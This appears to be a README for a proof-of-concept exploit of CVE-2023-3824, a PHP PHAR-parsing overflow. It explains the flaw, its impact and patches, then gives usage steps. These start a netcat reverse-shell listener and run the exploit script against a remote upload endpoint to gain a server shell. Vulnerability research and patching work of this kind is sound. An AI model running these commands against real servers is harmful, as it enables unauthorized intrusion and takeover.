CVE-2023-3824 is a critical remote code execution (RCE) vulnerability in PHP, affecting versions 8.0.x (before 8.0.30), 8.1.x (before 8.1.22), and 8.2.x (before 8.2.8). The vulnerability arises from insufficient length checking when processing PHAR files (PHP's archive format), specifically when reading PHAR directory entries in the Phar::loadPhar() function.
- Stack Buffer Overflow: The vulnerability stems from improper bounds checking, which can lead to a stack buffer overflow. If an attacker crafts a malicious PHAR file with overly long filenames or directory entries, they can trigger this overflow.
- Memory Corruption: This overflow can cause memory corruption, which in turn may allow an attacker to execute arbitrary code on the server hosting the vulnerable PHP version.
- Remote Code Execution: Successful exploitation could grant the attacker the ability to execute arbitrary code remotely, effectively compromising the entire system.
The attack typically involves submitting a maliciously crafted PHAR file to a vulnerable PHP application. If the application processes untrusted PHAR files (e.g., through file uploads), an attacker could exploit this to run arbitrary code on the server.
A proof-of-concept (PoC) for this vulnerability shows how a carefully crafted PHAR file can trigger the overflow. While exploiting this vulnerability requires specific conditions (such as an application using PHAR files), the potential for RCE makes it a severe issue, especially for PHP-based web applications.
- Update PHP: The primary fix is to update PHP to versions 8.0.30, 8.1.22, or 8.2.8, which include patches to address the vulnerability.
- Avoid Untrusted PHAR Files: As a general security measure, ensure your application avoids processing untrusted PHAR files.
This vulnerability has a high severity rating (CVSS 9.4) due to the potential for full system compromise. Keeping PHP updated is crucial to mitigate this risk.
Run reverse shell listener:
nc -l local_portThen run POC:
bash cve-2023-3824.sh remote_url local_ip local_port- remote_url is vulnerable remote php script, e.g.
https://wp.example.com/form-uploader.php - local_ip is an attacker machine IP
- local_port is an attacker machine port
If the exploit succeeds, you'll get the shell with the server's (apache, nginx) permissions.
.--,-``-.
,---, / / '.
,---, ,--.' | / ../ ;
,---.'| | | : \ ``\ .`- ' __ ,-.
| | : .--.--. : : : \___\/ \ :,' ,'/ /|
: : : ,--.--. ,---. / / ' : | |,--. \ : |' | |' |
: |,-. / \ / \ | : /`./ | : ' | / / / | | ,'
| : ' | .--. .-. | / / || : ;_ | | /' : \ \ \ ' : /
| | / : \__\/: . .. ' / | \ \ `.' : | | | ___ / : || | '
' : |: | ," .--.; |' ; /| `----. \ | ' | : / /\ / :; : |
| | '/ : / / ,. |' | / | / /`--' / : :_:,'/ ,,/ ',- .| , ;
| : |; : .' \ : |'--'. /| | ,' \ ''\ ; ---'
/ \ / | , .-./\ \ / `--'---' `--'' \ \ .'
`-'----' `--`---' `----' `--`-,,-'
inspired by ::PerfectForms::